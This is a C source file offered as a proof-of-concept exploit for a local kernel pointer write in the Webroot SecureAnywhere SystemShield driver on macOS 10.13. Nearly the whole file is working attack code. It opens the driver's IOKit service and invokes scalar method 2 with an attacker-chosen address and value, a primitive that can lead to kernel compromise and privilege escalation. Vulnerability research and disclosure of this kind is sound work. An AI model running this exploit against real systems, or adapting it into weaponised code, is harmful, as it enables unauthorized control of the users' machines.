/* securenowhere-write.c
 *
 * Copyright (c) 2018 by <mu-b@digit-labs.org>
 *
 * Webroot SecureAnywhere - SystemShieldClient local kernel pointer write PoC
 * by mu-b - Sun 24 Jun 2018
 *
 * $Id: securenowhere-write.c 43 2018-08-28 21:31:49Z mu-b $
 *
 * - Tested on: Webroot SecureAnywhere 9.0.8.28 (Apple MACOS X 10.13.X)
 *
 * an arbitrary pointer write, provided the pointer currently points to memory
 * containing '(void *) -1'.
 *
 * compile: lang -m64 -Wall securenowhere-write.c -framework IOKit -framework ApplicationServices -o securenowhere-write
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2018!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <ApplicationServices/ApplicationServices.h>

int
main (int argc, char **argv)
{
  io_connect_t secure_port;
  io_service_t service;
  kern_return_t kr;
  uint64_t buf[2];

  printf ("Webroot SecureAnywhere - SystemShieldClient local kernel pointer write PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2018!@$!\n\n");

  service = IOServiceGetMatchingService (kIOMasterPortDefault,
                                         IOServiceMatching("com_webroot_driver_SystemShield"));
  if (!service)
    {
      fprintf (stderr, "* IOServiceGetMatchingService failed, running?\n");
      return (EXIT_FAILURE);
    }

  secure_port = (io_connect_t) 0;
  kr = IOServiceOpen (service, mach_task_self (), 0, &secure_port);
  IOObjectRelease (service);

  if (kr != kIOReturnSuccess)
    {
      fprintf (stderr, "* IOServiceOpen failed\n");
      return (EXIT_FAILURE);
    }

  buf[1] = 0x0BADC0DE0BADC0DE; // write this
  buf[0] = 0xDEADBEEFDEADBEEF; // here, if *(uint32_t *) buf[0] = -1;
  kr = IOConnectCallScalarMethod (secure_port, 2, buf, 2, NULL, NULL);
  if (kr != kIOReturnSuccess)
    {
      fprintf (stderr, "* IOConnectCallScalarMethod failed\n");
      return (EXIT_FAILURE);
    }

  return (EXIT_SUCCESS);
}